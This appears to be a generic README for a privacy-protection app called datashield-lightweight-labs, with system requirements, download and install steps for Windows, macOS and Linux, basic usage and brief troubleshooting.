Welcome to datashield-lightweight-labs! This tool helps protect your privacy and user data while you browse the Internet. Follow the steps below to get started quickly.

📋 System Requirements

  • Operating System: Windows 10 or later, macOS 10.13 or later, or any Linux distribution
  • Memory: At least 2 GB RAM
  • Storage: 100 MB of free space
  • Internet Connection: Required for downloading and updating

📦 Download & Install

To download datashield-lightweight-labs, please visit our releases page.

Visit this page to download

Once you are on the releases page, follow these steps:

  1. Look for the latest version listed at the top.
  2. Click on the version number to expand the details.
  3. Choose the correct file for your operating system:
    • For Windows, select "datashield-windows.exe".
    • For macOS, choose "datashield-macos.dmg".
    • For Linux, download "datashield-linux.tar.gz".
  4. Click the file name to start the download.

After the download completes, install the application:

Windows Installation

  1. Locate the downloaded .exe file in your Downloads folder.
  2. Double-click the file to run the installer.
  3. Follow the on-screen instructions to complete the installation.

macOS Installation

  1. Open the .dmg file from your Downloads.
  2. Drag the "datashield" icon into your Applications folder.
  3. Eject the .dmg file.

Linux Installation

  1. Open a terminal window.
  2. Navigate to your Downloads folder.
  3. Extract the downloaded archive using: 
    tar -xvzf datashield-linux.tar.gz
  4. Navigate to the extracted folder to run the application.

⚙️ Using datashield-lightweight-labs

After installation, follow these steps to start using the application:

  1. Launch datashield-lightweight-labs from your Applications or Start menu.
  2. The first time you start the application, it may ask for network permissions. Grant these permissions to ensure proper operation.
  3. On the main interface, you will see options to scan for potential threats and manage your settings.
  4. Click the "Scan Now" button to begin protecting your data.

🔧 Troubleshooting

If you encounter issues, try the following:

  • Application Won't Start: Ensure that your operating system meets the system requirements. Restart your device and try launching the app again.
